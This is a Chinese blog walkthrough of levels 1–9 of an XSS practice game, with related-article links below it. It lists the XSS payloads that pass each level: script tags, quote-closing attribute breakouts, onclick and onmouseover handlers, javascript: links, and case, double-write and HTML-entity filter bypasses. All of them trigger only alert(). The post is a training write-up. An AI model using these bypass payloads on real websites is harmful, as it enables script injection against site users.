XSS-过关小游戏(1-9)

最新推荐文章于 2023-06-07 19:55:39 发布
最新推荐文章于 2023-06-07 19:55:39 发布
阅读量247 收藏
点赞数
分类专栏: XSS 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45791294/article/details/115269472
版权

触发alert()完成关卡。

1.

<script>alert()</script>

2.

先测试一下

ctrl + u 查看源代码

观察第17行,闭合第17行即可插入alert

"><script>alert()</script>

3.

测试,查看源代码

'onclick = 'alert()

onclick:当按钮被点击时执行Javascript代码,这里是为输入框加了onclick,所以访问之后需要点击一下输入框。同理还有onmouseover,访问后需要将鼠标移动至输入框。

 

4.

" onclick = "alert()

5.

大小写绕过未果

尝试新方法

通过点击超链接触发js

"><a href = javascript:alert()>123</a>//

 

6.

大小写绕过

" Onclick = "alert()

or

"><a Href = javascript:alert()>123

 

7.

尝试大小写未果,尝试双写

" oonnclick = "alert()

 

8.

 

将javascript进行实体编码(https://www.qqxiuzi.cn/bianma/zifushiti.php)//10进制16进制均可

&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert

点击友情链接

 

9.

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert()//http://

 

总结:

尖括号被转换可以考虑onclick和onmouseover等

单词被替换可以尝试大小写或者实体编码

单词被过滤可以尝试双写、大小写或实体编码

 

学到的payload:

<script>alert()</script>

<a href = javascript:alert()>

事件payload:onclick = alert()  onmouseover = alert()

Tomoon16
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
050 XSS通关小游戏——xss challenge
鸡蛋炒鸡蛋
03-05 5677
文章目录一:下载与部署二:通关过程首页level-01level-02level-03level-04level-05level-06level-07level-08level-09 一:下载与部署 xss challenge是个有关反射型xss的测试通关挑战,一共有20关。 下载地址:xss challenge (访问密码:donMkh) 下载之后解压,把得到的文件夹放在phpstudy的www文件夹下即可   二:通关过程 这个是我自己的通关方法,不一定很准确 首页 level-01 点击
见缝插圆小游戏hh(空格切换绘图模式)
m0_63144927的博客
03-30 2410
hh
XSS-10注入靶场闯关(小游戏)——第十关
qq_39330735的博客
02-04 347
XSS-game-10隐藏入口注入,需要在源代码查找到入口的html标签,然后修改对应的属性让其显示出来。然后再注入payload
XSS-通关小游戏(1-20)
热门推荐
→_→
05-28 1万+
在玩游戏之前先简单的了解下,什么是XSS? 1.什么是xss XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 2.xss原理 (1).攻击者对某含有漏洞的服务器发起XSS攻击(注入JS代码) (2)诱使受害者打开受到攻击的服务器URL(邮件、留言等,此步骤可选项) (3)受害者在Web浏览
Xss小游戏通关攻略带解释
sirius的博客
08-28 5455
Xss小游戏通关攻略 实验环境:xss小游戏源码+phpstudy 源码地址:https://files.cnblogs.com/files/Eleven-Liu/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 实验步骤:启动phpstudy,浏览器访问127.0.0.1/xss/后提示点击图片进入第一关。 第一关:输入的变量直接被输出,直接构造payload即可。 http://127.0.0.1/xss/level1.php?.
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-:xss原始码小游戏
03-23
xss- xss原始码小游戏最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家...
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS-7注入靶场闯关(小游戏)——第七关
qq_39330735的博客
02-04 180
XSS-7注入靶场闯关(小游戏)——第七关,双写绕过
XSS靶场通关详解(1-18关)
最新发布
cz020907020808的博客
06-07 2141
家人们,因为xss靶场比较简单,有些地方说的比较笼统,过关很容易,只需要多尝试就可以,但是学好就难了!
XSS闯关小游戏通关笔记
skynet_x的博客
10-29 1177
level1 — 无过滤 查看源码,没有任何的过滤。 直接在链接中构造最基本的XSS弹窗即可,弹窗内容为123. <script>alert(123)</script> level2 — input中未设置过滤 查看源码,发现在echo输出中有一个函数htmlspecialchars() htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。可以看成是对特定字符的过滤。 预定义的字符是: & (和号)成为 & " (双引号)成为 "
XSS-11注入靶场闯关(小游戏)——第十一关
qq_39330735的博客
02-04 456
XSS-11注入靶场闯关(小游戏)——第十一关通关详解,请求头referer注入
XSS-14、15注入靶场闯关(小游戏)——第十四、五关
qq_39330735的博客
02-04 977
XSS-15注入靶场闯关(小游戏)——第十五关,文件链接注入通关详解
2022-渗透测试-xss小游戏通关
保持微笑的博客
01-25 4842
这是一个在线靶场-xss小游戏通关,一共6关。链接地址: XSS game (xss-game.appspot.com)https://xss-game.appspot.com/登陆成功后,页面如下。 第一关:Hello, world of XSS 第一关没有对输入的字符串进行任何的过滤,我们可以在漏洞的窗体或直接在输入栏输入特定的恶意url以之行你想要的JavaScript脚本。 <script>alert('123');</script> 第二关:Persi.
XSS闯关小游戏(level1~13)
qq_43381463的博客
02-04 436
XSS闯关小游戏(level1~13)
XSS-9注入靶场闯关(小游戏)——第九关
qq_39330735的博客
02-04 583
XSS-9注入靶场闯关(小游戏)——第九关,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值